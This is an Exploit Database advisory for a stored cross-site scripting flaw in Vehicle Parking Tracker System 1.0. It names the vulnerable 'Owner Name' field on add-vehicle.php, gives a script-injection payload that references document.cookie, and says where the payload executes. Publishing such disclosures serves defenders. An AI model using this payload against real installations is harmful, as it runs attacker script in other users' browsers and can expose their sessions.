Vehicle Parking Tracker System 1.0 – ‘Owner Name’ Stored Cross-Site Scripting

• Exploit Database
• 18 阅读

• 作者： Anmol K Sachan
  日期： 2021-02-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49509/

• # Exploit Title: Vehicle Parking Tracker System 1.0 - 'Owner Name'Stored Cross-Site Scripting
  # Date: 2021-01-30
  # Exploit Author: Anmol K Sachan
  # Vendor Homepage: https://phpgurukul.com/
  # Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
  # Software: : Vehicle Parking Tracker System 
  # Version : 1.0
  # Vulnerability Type: Cross-site Scripting
  # Tested on Windows 10 XAMPP
  # This application is vulnerable to Stored XSS vulnerability.
  # Vulnerable script:
  
  1) http://localhost/vpms/add-vehicle.php
  # Vulnerable parameters: 'Owner Name'
  # Payload used: ()"><script>alert(‘document.cookie’)</script>
  # POC: manage-incomingvehicle.php
  # You will see your Javascript code executed.